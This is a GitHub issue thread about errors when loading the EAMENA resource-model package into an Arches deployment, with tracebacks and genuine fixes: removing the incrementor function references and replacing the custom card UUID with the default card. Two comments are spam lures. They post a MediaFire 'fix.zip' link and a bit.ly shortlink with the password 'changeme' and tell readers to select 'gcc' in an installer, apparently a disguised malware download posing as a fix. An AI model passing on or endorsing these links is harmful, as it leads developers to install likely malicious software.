### ISSUE TITLE
ACHP instance - EAMENA RM - load_package

### ISSUE THREAD

**Issue by zoometh** [achp-project/cultural-heritage#20]
In the frame of the https://achp.razekmh.dev/ deployement and RM uploads via `load_package`

## EAMENA

Trying to load the EAMENA package

```bash
root@9f19ae62b7e3:/arches_app/arches_proj# python manage.py packages -o load_package -s /arches_data/eamena-pkg
```

Gives this **[1]** error ...

```
...
loading resource models and branches
/arches_data/eamena-pkg/graphs/resource_models/Person-Organization.json
2024-08-27 10:32:42,599 arches.app.utils.data_management.resource_graphs.importer ERROR    Function matching query does not exist.
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/site-packages/arches/app/utils/data_management/resource_graphs/importer.py", line 106, in import_graph
    graph = Graph(resource)
            ^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/arches/app/models/graph.py", line 111, in __init__
    default_config = models.Function.objects.get(functionid=function["function_id"]).defaultconfig
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/django/db/models/manager.py", line 87, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/django/db/models/query.py", line 637, in get
    raise self.model.DoesNotExist(
arches.app.models.models.Function.DoesNotExist: Function matching query does not exist.
```

... for each RM: `Person-Organization.json` (above), `Grid Square.json`, etc. and the **[2]** error:

```bash
psycopg2.errors.ForeignKeyViolation: insert or update on table "cards" violates foreign key constraint "cards_componentid_63e855fd_fk_card_components_componentid"
DETAIL:  Key (componentid)=(60e4e022-e2ba-40a0-948d-0538e27fbe1c) is not present in table "card_components".
```

---
troubleshooting

## [1]

EAMENA RM has a **custom** function that is missing, see [here](https://github.com/achp-project/prj-eamena-marea/blob/main/resource_models/Person_Organization.json#L1058). It is probably linked to the incrementor function that hasn't been uploaded into Arches.

**fix**:

Remove the customized block in each RM: https://github.com/achp-project/prj-eamena-marea/blob/main/resource_models/Person_Organization.json#L1062-L1075

## [2]

`60e4e022-e2ba-40a0-948d-0538e27fbe1c` is the **custom** Eamena Form Card (EAMENA Card)

**fix**:

Change `60e4e022-e2ba-40a0-948d-0538e27fbe1c`  to the Default Card UUID

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ads04r** [comment]
### Importing EAMENA resource models into AHCP DB

Default card: f05e4d3a-53c1-11e8-b0ea-784f435179ea
EAMENA card: 60e4e022-e2ba-40a0-948d-0538e27fbe1c

Incrementor function: 2cc07b0a-adbd-4721-86ce-dad1699caa86

* Import EAMENA.xml / collections / all the stuff from the RDM
* Removed references to Incrementor function from the `function_x_graph` section of each resource model
* Find/replace of EAMENA card references to Default Card ID
* Import CIDOC_CRM ontology extensions
* Import package several times because some resource models depend on others. HP should go in last.
